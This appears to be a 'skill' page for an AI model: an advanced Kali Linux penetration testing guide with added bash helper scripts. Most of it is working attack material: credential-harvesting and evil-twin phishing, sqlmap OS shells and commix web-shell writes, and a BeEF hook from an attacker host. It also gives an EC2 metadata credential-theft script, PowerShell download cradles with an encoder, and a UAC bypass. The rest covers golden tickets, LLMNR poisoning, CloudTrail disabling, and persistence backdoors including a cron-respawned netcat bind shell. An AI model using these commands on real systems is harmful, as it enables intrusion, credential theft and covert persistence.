Mastering Kali Linux for Advanced Penetration Testing
Advanced Kali Linux pentesting guide: OSINT/stealth recon, wireless attacks (WPA2/WPS/Evil Twin), web exploitation (Burp/sqlmap/BeEF), cloud exploitation (AWS IAM/S3), AV evasion (Veil/fileless/UAC bypass), Metasploit, lateral movement (CrackMapExec/ProxyChains), privilege escalation, and Kerberos golden ticket attack.
- › Execute stealth scanning: decoys, packet fragmentation, source port manipulation, proxychains
- › Perform OSINT recon: Maltego, SpiderFoot, theHarvester, Google dorks, CeWL wordlists
- › Conduct wireless attacks: WPA2 handshake capture/crack, WPS Pixie-Dust, Evil Twin with Wifiphisher
- › Exploit web apps: Burp Suite workflow, sqlmap with WAF bypass, commix, BeEF browser hook
- › Evade AV: Veil framework, fileless PowerShell download cradle, encoded commands, UAC bypass
- › Perform lateral movement: CrackMapExec, ProxyChains + SOCKS pivot, PsExec, WMIC
- › Execute Kerberos golden ticket attack after compromising krbtgt hash
Install this skill and Claude can design stealth recon workflows, select and sequence wireless attacks based on target AP configuration, compare AV evasion payload delivery techniques for specific endpoint security stacks, build lateral movement chains with CrackMapExec and ProxyChains, and walk through the Kerberos golden ticket attack chain for authorized assessments
Advanced penetration testing requires technique selection and evasion judgment, not just syntax recall. Understanding which attack approach fits a given environment and security stack is what separates effective authorized engagements from noisy ones that trigger defenses before objectives are reached.
- › Determining whether to attempt WPS Pixie-Dust via reaver or capture a WPA2 four-way handshake via deauth given a specific access point configuration, then outlining the cracking approach for each path
- › Designing a fileless PowerShell delivery chain for a Windows target with Defender enabled that avoids disk writes and establishes a Meterpreter session over HTTPS
- › Walking through the Kerberos golden ticket attack chain from dcsync krbtgt hash acquisition to full domain persistence that survives a normal account password reset
Mastering Kali Linux Skill
Goal-Based Penetration Testing Methodology
Phase 1: Reconnaissance (passive → active)
Phase 2: Vulnerability Assessment
Phase 3: Exploitation
Phase 4: Post-Exploitation (lateral movement, privilege escalation)
Phase 5: Reporting
Objective-based testing: Define specific goals before starting — e.g., “access HR database” or “achieve domain admin” — rather than generic “find all vulns.”
OSINT and Passive Reconnaissance
Domain and Email Enumeration
# Passive DNS recon
whois target.com
dig target.com ANY # many resolvers refuse ANY (RFC 8482); query A, MX, NS, TXT individually if so
dnsrecon -d target.com -t std
# Email harvesting
theHarvester -d target.com -b google,linkedin,bing -l 500
# OSINT frameworks
maltego # visual link analysis of entities
spiderfoot -s target.com -u all # automated OSINT with every module (web UI instead: spiderfoot -l 127.0.0.1:5001)
# Google Dork examples
site:target.com filetype:pdf
site:target.com inurl:admin
intitle:"index of" site:target.com
"@target.com" filetype:xls
Custom Wordlist Generation
# CeWL: spider website for custom wordlist
cewl -d 3 -m 8 -w custom_wordlist.txt https://target.com
# twofi: extract words from Twitter
twofi -u target_twitter -m 6 > twitter_words.txt # words from a user's timeline (prints to stdout; needs Twitter API keys in twofi.yml)
# Combine and deduplicate
cat custom_wordlist.txt twitter_words.txt | sort -u > combined.txt
Active Reconnaissance
Stealth Scanning Techniques
# Slow scan to evade IDS
nmap -sS -T2 -p 1-65535 target # SYN scan, polite timing (-T0 paranoid / -T1 sneaky are slower still)
# Decoy scan (hide real IP among decoys)
nmap -D RND:10 target # random decoys
nmap -D decoy1,decoy2,ME target # specific decoys
# Fragmented packets (evade packet inspection)
nmap -f target
# Source port spoofing (bypass firewall rules allowing port 53/80)
nmap --source-port 53 target
# Proxy chains for anonymity
proxychains nmap -sT -Pn target # TCP connect scan through the SOCKS proxy (SOCKS carries TCP only: no SYN scan, no ICMP ping)
# Combine masscan (speed) + nmap (accuracy)
masscan -p 1-65535 --rate=1000 target -oG masscan.txt
ports=$(awk '/open/ {print $5}' masscan.txt | cut -d/ -f1 | sort -un | paste -sd, -) # port spec is field 5 ("Ports:" is field 4)
nmap -sV -sC -p $ports target
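The masscan-to-nmap hand-off above is where most scripted sweeps go wrong, because masscan's grepable line puts the port spec in the fifth whitespace-separated field and a single superset port list hides which host had which port. The following is an added example (not code from the original page) that parses masscan `-oG` output per host and builds the follow-up nmap commands; the hosts and ports in the sample file are constructed.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: convert masscan's grepable
# output into the port list nmap expects, and build the follow-up nmap command.
# A masscan -oG line looks like
#   Host: 10.0.0.5 ()<TAB>Ports: 443/open/tcp////
# so the port spec is the 5th whitespace-separated field ("Ports:" is the 4th).

# All open ports in a masscan -oG file: unique, numerically sorted, comma-joined.
masscan_open_ports() {
    awk '/Ports:/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /\/open\//) { split($i, f, "/"); print f[1] }
         }' "$1" | sort -un | paste -sd, -
}

# Open ports grouped per host ("host port,port,...") so a wide sweep is not
# collapsed into one superset scan of every port against every host.
masscan_ports_by_host() {
    awk '/Ports:/ {
            host = $2
            for (i = 1; i <= NF; i++)
                if ($i ~ /\/open\//) { split($i, f, "/"); ports[host] = ports[host] "," f[1] }
         }
         END { for (h in ports) print h, substr(ports[h], 2) }' "$1" | sort
}

# The version/script scan for one host, printed rather than executed.
# -Pn: masscan already proved the host is up, so skip nmap's host discovery.
nmap_followup_cmd() {
    printf 'nmap -sV -sC -Pn -p %s %s\n' "$2" "$1"
}

# Run the follow-up scan for every host in a masscan file (network; not
# exercised by the checks below). Hosts and ports come from the file.
scan_all_hosts() {
    masscan_ports_by_host "$1" | while read -r host ports; do
        nmap -sV -sC -Pn -p "$ports" -oA "nmap_$host" "$host"
    done
}

# Constructed sample file (hosts and ports are made up) in masscan -oG format.
write_sample_masscan() {
    {
        echo '# Masscan 1.3.2 scan initiated'
        printf 'Host: %s ()\tPorts: %s/open/tcp////\n' \
            10.0.0.5 443  10.0.0.5 22  10.0.0.7 8080  10.0.0.7 22
        echo '# End'
    } > "$1"
}
```

Usage: `write_sample_masscan m.txt; masscan_ports_by_host m.txt` prints one line per host; `scan_all_hosts masscan.txt` runs the real follow-up against a genuine masscan file. Per-host grouping matters on large ranges, where a single `-p` superset multiplies scan time and noise by the number of hosts.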
Internal Network Enumeration
# ARP discovery (layer 2, fast)
arp-scan -l # local network
nmap -sn -PR 192.168.1.0/24 # ARP ping sweep (host discovery only, no port scan)
# SNMP enumeration (if UDP 161 open)
snmpwalk -c public -v1 target # walk MIB with community string "public"
snmp-check target # enumerate users, interfaces, processes
# SMB enumeration
enum4linux -a target # full Windows/Samba enumeration
smbclient -L //target -N # list shares, no password
crackmapexec smb 192.168.1.0/24 # enumerate entire subnet
Active Directory Reconnaissance
# AD enumeration (with credentials)
bloodhound-python -u user -p pass -d corp.local -ns 192.168.1.10 -c All
# Import JSON files into BloodHound GUI
ldapsearch -x -H ldap://192.168.1.10 -D "user@corp.local" -w pass -b "dc=corp,dc=local" "(objectClass=user)" # AD rejects anonymous binds for most queries
# From Windows (after compromise; needs the ActiveDirectory module from RSAT)
powershell Get-ADUser -Filter * -Properties *
powershell Get-ADComputer -Filter * -Properties OperatingSystem
Vulnerability Assessment
Nmap NSE Scripts
# Vulnerability scan
nmap --script vuln target
nmap --script=smb-vuln* target # all SMB vulnerability checks
nmap --script=http-shellshock target # Shellshock test
# Service-specific scripts
nmap -p 21 --script ftp-anon target # anonymous FTP check
nmap -p 445 --script smb-enum-shares target
nmap -p 3306 --script mysql-empty-password target
# Custom Lua NSE script skeleton (save under /usr/share/nmap/scripts/, then nmap --script-updatedb)
description = [[ Checks for vulnerability X ]]
categories = {"vuln"}
local shortport = require "shortport"
-- portrule decides which host:port pairs the action runs against
portrule = shortport.port_or_service(80, "http")
action = function(host, port)
  -- test and return result (a string to report, or nil to report nothing)
  return "result"
end
Web Application Scanning
nikto -h https://target.com -ssl # basic web vuln scan
nikto -h target.com -port 8080 -Tuning 4 # XSS focused
# OWASP ZAP headless mode
zaproxy -daemon -config api.key=mykey -port 8090 &
curl "http://localhost:8090/JSON/spider/action/scan/?apikey=mykey&url=http://target.com"
OpenVAS Network Scanner
gvm-start # start Greenbone/OpenVAS
# Access web UI at https://localhost:9392
# Create target → create task → run → export report
Social Engineering
Social Engineering Toolkit (SET)
setoolkit
# 1) Social-Engineering Attacks
# → 2) Website Attack Vectors
# → 3) Credential Harvester Attack Method
# → 2) Site Cloner
# → Enter target URL (e.g., gmail.com login page)
# SET clones site, hosts on attacker, harvests submitted creds
Phishing with Gophish
# Configure Gophish server
./gophish # start on :3333 (admin) and :80 (phishing)
# Create:
# 1. Sending profile (SMTP server)
# 2. Email template (HTML, with {{.URL}} tracking link)
# 3. Landing page (capture form submissions)
# 4. User group (target emails from CSV)
# 5. Campaign → launch → monitor open/click/credential rates
Physical Access Attacks
# Dump Windows password hashes offline (boot Kali, mount the Windows volume at /mnt/windows)
samdump2 /mnt/windows/Windows/System32/config/SYSTEM \
/mnt/windows/Windows/System32/config/SAM > hashes.txt
john --format=NT hashes.txt # crack NTLM hashes
# Change Windows password directly
chntpw -i /mnt/windows/Windows/System32/config/SAM
# Select user → clear password or set new
# Sticky Keys backdoor (before Windows login)
# Replace C:\Windows\System32\sethc.exe with cmd.exe
# Press Shift 5× at login → get SYSTEM shell
Wireless Attacks
WPA2 Cracking
# Monitor mode
airmon-ng check kill
airmon-ng start wlan0 # creates wlan0mon
# Capture handshake
airodump-ng -c [channel] --bssid [AP_MAC] -w capture wlan0mon
# Deauth a client to force reconnect (and handshake)
aireplay-ng -0 3 -a [AP_MAC] -c [client_MAC] wlan0mon
# Crack WPA2 handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# WPS attack with Reaver
reaver -i wlan0mon -b [AP_MAC] -vv -K 1 # Pixie-Dust attack (fast)
reaver -i wlan0mon -b [AP_MAC] -vv # brute force WPS PIN
Evil Twin Attack
# Wifiphisher: automated evil twin
wifiphisher -aI wlan0 -eI wlan1 --essid "TargetNetwork" -p wifi-connect
# Deauths clients from real AP, serves captive portal via evil twin
# Victim enters credentials on fake portal → captured
Bluetooth Attacks
hcitool scan # discover Bluetooth devices
hcitool info [BT_address] # get device info
l2ping -c 10 [BT_address] # ping test
sdptool browse [BT_address] # service discovery
Web Application Exploitation
Burp Suite Workflow
1. Set browser to proxy localhost:8080
2. Intercept requests → modify headers, parameters, cookies
3. Crawl (Spider in Burp 1.x) → discover all endpoints
4. Scanner (Burp Pro) → auto-detect vulnerabilities
5. Intruder → fuzz:
- Sniper: single parameter with payload list
- Cluster bomb: multiple parameters, all combinations
6. Repeater → manually test specific requests
7. Extensions (Extender in older releases) → add Python/Java plugins (CSRF bypass, JWT editor, etc.)
SQL Injection with sqlmap
# Basic detection
sqlmap -u "http://target.com/page?id=1" --dbs
# With Burp request file
sqlmap -r request.txt --dbs --level=5 --risk=3
# Dump database
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump
# Get OS shell (needs DBA-level privileges: e.g. MySQL FILE with a writable web root, or MSSQL xp_cmdshell)
sqlmap -u "http://target.com/page?id=1" --os-shell
# WAF bypass
sqlmap -u "..." --tamper=space2comment,randomcase,charencode
OS Command Injection (commix)
commix --url="http://target.com/search.php?query=test"
commix --url="http://target.com/" --data="field=test" # POST
commix --url="..." --file-write=/var/www/shell.php --file-dest=/var/www/html/shell.php
Browser Exploitation Framework (BeEF)
# Start BeEF
beef-xss
# Access panel: http://localhost:3000/ui/panel
# Hook a browser: inject into web page:
<script src="http://attacker:3000/hook.js"></script>
# From hooked browser panel:
# → Social Engineering: fake Flash update → payload delivery
# → Network: internal network scanner from victim's browser
# → Tunneling proxy: route HTTP through victim's browser
Cloud Security Exploitation
AWS Misconfiguration Testing
# S3 bucket enumeration
aws s3 ls s3://target-bucket --no-sign-request # public bucket check
aws s3 sync s3://target-bucket . --no-sign-request # download all files
# EC2 metadata SSRF (IMDSv1: a plain GET works; IMDSv2 first needs a PUT to /latest/api/token and the X-aws-ec2-metadata-token header)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → Lists the instance role; requesting that role name returns temporary credentials (AccessKeyId, SecretAccessKey, Token)
# Enumerate with stolen credentials (the Token must also be set as aws_session_token or every call fails)
aws configure --profile stolen
aws sts get-caller-identity --profile stolen
aws iam list-users --profile stolen
aws secretsmanager list-secrets --profile stolen
aws s3 ls --profile stolen
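Two details the snippet above leaves implicit decide whether the stolen role actually works: IMDSv2 refuses the plain GET until a session token has been fetched with a PUT, and role credentials are temporary, so the profile needs `aws_session_token` as well as the key pair. The following is an added example (not code from the original page) that handles both; the IMDS hostname and paths are the real ones, while the role JSON is constructed and its key values are fake.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page. (1) On instances that
# enforce IMDSv2 the unauthenticated GET returns 401; a PUT to /latest/api/token
# must come first. (2) Role credentials include a session Token; a profile
# without aws_session_token fails every call with InvalidClientTokenId.
# Network calls are isolated in imds_role_creds; the parsing is pure shell.

IMDS=http://169.254.169.254

# Fetch the instance role's credentials, IMDSv2 first with a v1 fallback.
# Only meaningful from inside an EC2 instance (or through an SSRF); not run here.
imds_role_creds() {
    local tok role
    tok=$(curl -s -m 2 -X PUT "$IMDS/latest/api/token" \
              -H 'X-aws-ec2-metadata-token-ttl-seconds: 60') || true
    role=$(curl -s -m 2 -H "X-aws-ec2-metadata-token: $tok" \
              "$IMDS/latest/meta-data/iam/security-credentials/")
    curl -s -m 2 -H "X-aws-ec2-metadata-token: $tok" \
         "$IMDS/latest/meta-data/iam/security-credentials/$role"
}

# Pull one string field out of the flat IMDS JSON ($1 key, $2 json) without jq.
json_field() {
    printf '%s' "$2" | sed -n "s/.*\"$1\" *: *\"\([^\"]*\)\".*/\1/p"
}

# Emit the aws-cli commands that load the JSON ($2) into profile $1.
# Printed rather than executed so the operator can review them first.
creds_to_profile_cmds() {
    local profile=$1 json=$2 key secret token
    key=$(json_field AccessKeyId "$json")
    secret=$(json_field SecretAccessKey "$json")
    token=$(json_field Token "$json")
    [ -n "$key" ] && [ -n "$secret" ] && [ -n "$token" ] \
        || { echo "incomplete credential JSON (no AccessKeyId/SecretAccessKey/Token)" >&2; return 1; }
    printf 'aws configure set aws_access_key_id %s --profile %s\n' "$key" "$profile"
    printf 'aws configure set aws_secret_access_key %s --profile %s\n' "$secret" "$profile"
    printf 'aws configure set aws_session_token %s --profile %s\n' "$token" "$profile"
    printf 'aws sts get-caller-identity --profile %s\n' "$profile"
}

# Constructed sample of what IMDS returns for a role (every value is fake).
SAMPLE_JSON='{"Code":"Success","LastUpdated":"2024-05-01T10:00:00Z","Type":"AWS-HMAC","AccessKeyId":"ASIAEXAMPLE0000000001","SecretAccessKey":"ExampleSecretKey00000000000000000000","Token":"ExampleSessionToken0000","Expiration":"2024-05-01T16:00:00Z"}'
```

Usage on a real instance: `creds_to_profile_cmds stolen "$(imds_role_creds)" | sh`. The Expiration field is worth checking before a long enumeration run, since role credentials rotate and a profile built from them goes stale silently.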
AWS IAM Privilege Escalation
# Check effective permissions (needs iam:SimulatePrincipalPolicy on the caller; otherwise enumerate attached and inline policies)
aws iam simulate-principal-policy \
--policy-source-arn arn:aws:iam::123456789012:user/victim \
--action-names iam:CreatePolicyVersion \
--resource-arns "*"
# CloudTrail tampering (after gaining access)
aws cloudtrail stop-logging --name mytrail # disable logging (the call is itself logged and GuardDuty alerts on it)
# Better: don't generate unusual API calls; bulk IAM enumeration from a new source IP stands out on its own
Bypassing Security Controls
AV Evasion with Veil Framework
veil
# → use Evasion
# → use python/meterpreter/rev_tcp
# → set LHOST / LPORT
# → generate → saves .py and .exe
# Wraps the shellcode in a Python stub (AES-encrypted, decrypted at runtime) and compiles it with PyInstaller; the stub itself is widely signatured, so test against the target's AV first
Fileless Attacks
# PowerShell download cradle (script runs in memory; nothing is written to disk, but AMSI and script block logging still see the decoded script)
IEX(New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')
# Encoded command (avoids quoting problems; it does not hide anything: script block logging (event 4104) records the decoded text)
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://attacker/payload.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
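The encoding above is done on the target in PowerShell; on an engagement you usually build the string on Kali and paste one command line, and the blue team does the inverse on logged command lines. The following is an added example (not code from the original page) that does both from a Linux shell: `-EncodedCommand` expects base64 over UTF-16LE, and using plain UTF-8 is the usual reason an encoded one-liner silently does nothing. The payload URL is the page's placeholder `http://attacker/payload.ps1`, and the logged command line is constructed.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page. powershell.exe -EncodedCommand
# takes base64(UTF-16LE(command)); these helpers build and reverse that from
# Kali. iconv and base64 are standard on Kali.

# Plain command ($1) -> the -EncodedCommand argument.
ps_encode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
    echo
}

# -EncodedCommand argument ($1) -> plain command (what an analyst does with a
# 4688 / Sysmon event 1 command line).
ps_decode() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
    echo
}

# Full command line for the download cradle on the page; $1 is the payload URL.
cradle_cmdline() {
    local cradle="IEX(New-Object Net.WebClient).DownloadString('$1')"
    printf 'powershell -NoProfile -EncodedCommand %s\n' "$(ps_encode "$cradle")"
}

# Recover the decoded command from a logged command line: finds the
# -e/-enc/-EncodedCommand argument (case-insensitive, as PowerShell accepts it).
decode_logged_cmdline() {
    local b64
    b64=$(printf '%s' "$1" \
          | grep -oiE '(-e|-enc|-encodedcommand) +[A-Za-z0-9+/=]+' \
          | awk '{print $2}' | head -n1)
    [ -n "$b64" ] || { echo "no encoded command found" >&2; return 1; }
    ps_decode "$b64"
}
```

Usage: `cradle_cmdline http://attacker/payload.ps1` prints the line to run on the target; `decode_logged_cmdline "$line"` turns a captured command line back into readable PowerShell. Whatever the encoding, script block logging stores the decoded text, so the encoded form only buys you quoting convenience, not stealth.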
UAC Bypass (Windows 10)
# fodhelper.exe UAC bypass (needs a medium-integrity process running as a member of local Administrators, with UAC at its default level)
# Registry hijack: fodhelper reads HKCU\Software\Classes\ms-settings\Shell\Open\command
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Windows\System32\cmd.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /f
fodhelper.exe # spawns cmd.exe with high integrity (elevated)
# Clean up afterwards: reg delete "HKCU\Software\Classes\ms-settings" /f
Exploitation
Metasploit Workflow
msfconsole
db_nmap -sV -p 1-65535 target # nmap into MSF database
vulns # show detected vulnerabilities
hosts; services # view enumeration data
# Exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
run
# Resource file for multiple targets
echo "use exploit/multi/handler" > auto.rc
echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> auto.rc
echo "set LHOST 192.168.1.10" >> auto.rc
echo "run -j" >> auto.rc
msfconsole -r auto.rc
Developing Windows Exploits
1. Fuzz: send incrementally larger inputs until crash
2. Replicate crash in Immunity Debugger (note EIP value)
3. Find offset: pattern_create → send → pattern_offset
4. Verify EIP control: send offset A's + BBBB → EIP = 0x42424242
5. Find bad chars: test 0x01-0xff, note which corrupt the payload
6. Find JMP ESP: !mona find -s "\xff\xe4" -m "module.dll" (no ASLR/SafeSEH)
7. Generate shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=... -b "\x00\x0a" -f c
8. Build: offset + JMP ESP + NOP sled + shellcode
Post-Exploitation and Lateral Movement
Meterpreter Post-Exploitation
meterpreter> getuid # current user
meterpreter> getsystem # attempt privesc to SYSTEM
meterpreter> hashdump # dump NTLM hashes
meterpreter> run post/windows/gather/credentials/credential_collector
meterpreter> run post/multi/recon/local_exploit_suggester
meterpreter> portfwd add -l 3389 -p 3389 -r internal_host # port forward RDP
# Meterpreter pivoting (from msfconsole, after backgrounding the session)
route add 10.10.10.0/24 [session_id] # route through meterpreter
use auxiliary/scanner/portscan/tcp # now scan internal 10.10.10.x
CrackMapExec for Lateral Movement
# Spray credentials across network
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123'
# "Pwn3d!" after a host means the account is local admin there
# Execute commands
crackmapexec smb target -u admin -p password -x "whoami"
crackmapexec smb target -u admin -H ntlm_hash --exec-method smbexec -x "cmd"
# Dump hashes
crackmapexec smb target -u admin -p password --sam # SAM hashes
crackmapexec smb target -u admin -p password --lsa # LSA secrets
ProxyChains Pivoting
# Configure /etc/proxychains.conf:
socks5 127.0.0.1 1080
# Set up SOCKS proxy from msfconsole (needs a route to the internal subnet via the session first)
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j
# Now access internal network through victim
proxychains nmap -sT internal_target
proxychains ssh user@internal_server
Privilege Escalation
Windows Privilege Escalation
# Local admin → SYSTEM
meterpreter> getsystem # tries token impersonation, service techniques, etc.
# DLL search-order hijacking (process tries to load a DLL that is missing)
# 1. Find process with missing DLL (via ProcMon: NAME NOT FOUND on a .dll load)
# 2. Craft malicious DLL: msfvenom -p windows/meterpreter/reverse_tcp ... -f dll -o evil.dll
# 3. Place DLL in a writable directory earlier in the search order (e.g., the application's own folder)
# 4. Trigger process restart → meterpreter session with the process's privileges
Kerberos Golden Ticket Attack
# Requirements: domain admin (or DCSync/replication rights), the krbtgt NTLM hash, and the domain SID
# Step 1: Get krbtgt hash (requires DA or replication rights)
meterpreter> hashdump # on a DC; or mimikatz
mimikatz> lsadump::dcsync /domain:corp.local /user:krbtgt
# Step 2: Generate golden ticket (mimikatz default lifetime 10 years; survives user password resets and is only invalidated by resetting krbtgt twice)
mimikatz> kerberos::golden /user:Administrator /domain:corp.local \
/sid:S-1-5-21-xxx /krbtgt:[krbtgt_NTLM_hash] /ticket:golden.kirbi
# Step 3: Pass ticket
mimikatz> kerberos::ptt golden.kirbi
mimikatz> exit
klist # verify ticket loaded
# Now access any service in the domain as Administrator
dir \\dc01.corp.local\C$
Responder for Credential Capture
responder -I eth0 -wrf
# Poisons LLMNR/NBT-NS → captures NetNTLMv2 hashes
# Force NTLMv1/LM downgrade (easier to crack, but loud and incompatible with relaying; relay uses ntlmrelayx with Responder's SMB/HTTP servers off)
responder -I eth0 --lm --disable-ess
# Crack captured hashes
hashcat -m 5600 netntlm.txt rockyou.txt # 5600 = NetNTLMv2; use 5500 for NetNTLMv1
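A Responder capture file collected across a downgrade and a normal run mixes NetNTLMv1 and NetNTLMv2 lines, and hashcat rejects the wrong mode for each. The following is an added example (not code from the original page) that tells the two apart by field layout, splits the file per mode and prints the crack commands; the sample hashes are constructed filler of the right lengths, not captured traffic.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page. Responder logs one capture
# per line, and NetNTLMv1 / NetNTLMv2 need hashcat modes 5500 / 5600. The
# formats are told apart by field layout, not by any label:
#   v1: user::DOMAIN:<LM response, 48 hex>:<NT response, 48 hex>:<challenge, 16 hex>
#   v2: user::DOMAIN:<challenge, 16 hex>:<NTProofStr, 32 hex>:<blob, >32 hex>

# Print 5500 (NetNTLMv1) or 5600 (NetNTLMv2) for one capture line; fail otherwise.
netntlm_mode() {
    local user empty domain a b c
    IFS=: read -r user empty domain a b c <<<"$1"
    if [ ${#a} -eq 16 ] && [ ${#b} -eq 32 ] && [ ${#c} -gt 32 ]; then
        echo 5600
    elif [ ${#a} -eq 48 ] && [ ${#b} -eq 48 ] && [ ${#c} -eq 16 ]; then
        echo 5500
    else
        return 1
    fi
}

# Split a capture file ($1) into <outdir>/5500.txt and <outdir>/5600.txt,
# reporting lines that are neither on stderr.
split_netntlm() {
    local infile=$1 outdir=$2 line mode
    mkdir -p "$outdir"
    : > "$outdir/5500.txt"; : > "$outdir/5600.txt"
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        mode=$(netntlm_mode "$line") || { echo "skip (not NetNTLM): $line" >&2; continue; }
        printf '%s\n' "$line" >> "$outdir/$mode.txt"
    done < "$infile"
}

# Crack commands for whichever per-mode files are non-empty.
hashcat_cmds() {
    local outdir=$1 m
    for m in 5500 5600; do
        [ -s "$outdir/$m.txt" ] || continue
        printf 'hashcat -m %s %s/%s.txt /usr/share/wordlists/rockyou.txt\n' "$m" "$outdir" "$m"
    done
    return 0
}

# Constructed samples: digit runs as hex filler of the correct field lengths.
SAMPLE_V2="jdoe::CORP:$(printf '%016d' 1):$(printf '%032d' 2):$(printf '%0200d' 3)"
SAMPLE_V1="svc_backup::CORP:$(printf '%048d' 4):$(printf '%048d' 5):$(printf '%016d' 6)"
```

Usage: `split_netntlm Responder-Session.log hashes && hashcat_cmds hashes | sh`. NetNTLMv1 without ESS is also a candidate for the DES-keyspace attack (hashcat mode 14000 after conversion) rather than a wordlist, which is why the downgrade is worth the noise on an engagement that allows it.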
C2 and Persistence
Persistence Techniques (Windows)
# Scheduled task persistence
schtasks /create /sc ONLOGON /tn "Updater" /tr "C:\backdoor.exe" /ru SYSTEM
# Registry run key
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" \
/v "Updater" /t REG_SZ /d "C:\backdoor.exe" /f
# WMI persistence: a permanent event subscription (filter + consumer + binding) in root\subscription.
# Register-WmiEvent is session-scoped and dies with the PowerShell process, so it does not persist.
$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
  Name='Updater'; EventNamespace='root\cimv2'; QueryLanguage='WQL';
  Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" }
$c = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
  Name='Updater'; CommandLineTemplate='C:\backdoor.exe' }
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{ Filter=$f; Consumer=$c }
# Fires about 4-5 minutes after each boot; writing to root\subscription needs local admin
# Netcat persistent listener (Linux; -e needs ncat or netcat-traditional, not netcat-openbsd)
nc -lvnp 4444 -e /bin/bash &
# Respawn from cron if killed (pgrep guard so a second listener is not spawned every minute)
(crontab -l 2>/dev/null; echo '* * * * * pgrep -x nc >/dev/null || nc -lvnp 4444 -e /bin/bash') | crontab -